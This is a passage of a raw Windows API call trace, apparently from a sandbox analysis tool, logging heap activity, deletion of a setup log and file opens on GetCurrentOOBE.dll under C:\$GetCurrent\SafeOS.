0x424 [0059.797] GetFileType (hFile=0x424) returned 0x1 [0059.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0059.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8b218 [0059.797] GetLastError () returned 0xb7 [0059.797] SetLastError (dwErrCode=0xb7) [0059.797] WriteFile (in: hFile=0x424, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0059.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b218 | out: hHeap=0x20000) returned 1 [0059.798] CloseHandle (hObject=0x424) returned 1 [0059.799] AreFileApisANSI () returned 1 [0059.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0059.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46898 [0059.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x46898, cchWideChar=51 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 51 [0059.799] DeleteFileW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log")) returned 1 [0059.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0059.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0059.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0059.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0059.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0059.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0059.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0059.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0059.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d7b0 | out: hHeap=0x20000) returned 1 [0059.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0059.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0059.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0059.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0059.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0059.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0059.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0059.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0059.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0059.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.800] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x38, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x20320, ftLastWriteTime.dwLowDateTime=0x1, ftLastWriteTime.dwHighDateTime=0x1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x23, dwReserved1=0x0, cFileName="8", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧蘐\x07̧비聐薸\x08賂̧")) returned 0 [0059.800] FindClose (in: hFindFile=0x78610 | out: hFindFile=0x78610) returned 1 [0059.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0059.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0059.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0059.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0059.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0059.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0059.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0059.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0059.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0059.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e18 | out: hHeap=0x20000) returned 1 [0059.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0059.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0059.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0059.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0059.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0059.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0059.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0059.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0059.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0059.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0059.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0059.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0059.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0059.801] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.801] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.801] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.801] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0059.801] AreFileApisANSI () returned 1 [0059.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$GetCurrent\\SafeOS", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS", lpUsedDefaultChar=0x0) returned 22 [0059.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0059.801] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.801] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0059.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0059.801] AreFileApisANSI () returned 1 [0059.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0059.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e2d0 [0059.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x4e2d0, cchWideChar=22 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS") returned 22 [0059.802] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS" (normalized: "c:\\$getcurrent\\safeos"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0059.802] GetLastError () returned 0x5 [0059.802] GetLastError () returned 0x5 [0059.802] SetLastError (dwErrCode=0x5) [0059.802] GetLastError () returned 0x5 [0059.802] SetLastError (dwErrCode=0x5) [0059.802] GetLastError () returned 0x5 [0059.802] SetLastError (dwErrCode=0x5) [0059.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0059.802] AreFileApisANSI () returned 1 [0059.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0059.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e260 [0059.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x4e260, cchWideChar=22 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS") returned 22 [0059.802] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS" (normalized: "c:\\$getcurrent\\safeos"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0059.802] GetLastError () returned 0x5 [0059.802] GetLastError () returned 0x5 [0059.802] SetLastError (dwErrCode=0x5) [0059.802] GetLastError () returned 0x5 [0059.802] SetLastError (dwErrCode=0x5) [0059.802] GetLastError () returned 0x5 [0059.802] SetLastError (dwErrCode=0x5) [0059.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0059.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0059.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0059.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0059.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0059.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0059.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0059.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0059.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0059.803] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x2a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x78498, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x2a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="")) returned 0 [0059.803] FindClose (in: hFindFile=0x78950 | out: hFindFile=0x78950) returned 1 [0059.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0059.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0059.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0059.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0059.803] FindFirstFileExW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78950 [0059.916] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.916] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9568f13f, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9568f13f, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentOOBE.dll", cAlternateFileName="GETCUR~1.DLL")) returned 1 [0059.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0059.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0059.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0059.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0059.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0059.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0059.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0059.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0059.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0059.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0059.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0059.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0059.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0059.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46278 [0059.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0059.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0059.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0059.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0059.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0059.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0059.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0059.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0059.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0059.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0059.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0059.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0059.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0059.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0059.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0059.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0059.920] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0059.920] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.920] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.920] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.920] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.920] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0059.920] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0059.920] AreFileApisANSI () returned 1 [0059.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll", lpUsedDefaultChar=0x0) returned 41 [0059.920] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0059.920] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.920] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.920] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0059.920] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0059.921] AreFileApisANSI () returned 1 [0059.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0059.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67660 [0059.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x67660, cchWideChar=41 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 41 [0060.047] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.047] GetFileType (hFile=0x41c) returned 0x1 [0060.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67660 | out: hHeap=0x20000) returned 1 [0060.047] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0060.047] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0060.048] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0060.048] CloseHandle (hObject=0x41c) returned 1 [0060.048] AreFileApisANSI () returned 1 [0060.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0060.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67900 [0060.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=41 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 41 [0060.048] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.048] GetFileType (hFile=0x41c) returned 0x1 [0060.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0060.048] CloseHandle (hObject=0x41c) returned 1 [0060.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.049] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.049] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.049] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.049] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.049] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.049] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0060.049] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.049] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.049] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.049] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.049] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.049] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0060.049] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0060.049] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.049] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0060.049] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.049] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0060.049] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0060.049] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0060.049] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.049] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.049] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0060.049] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0060.049] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.049] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0060.049] AreFileApisANSI () returned 1 [0060.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0060.049] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67540 [0060.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=41 | out: 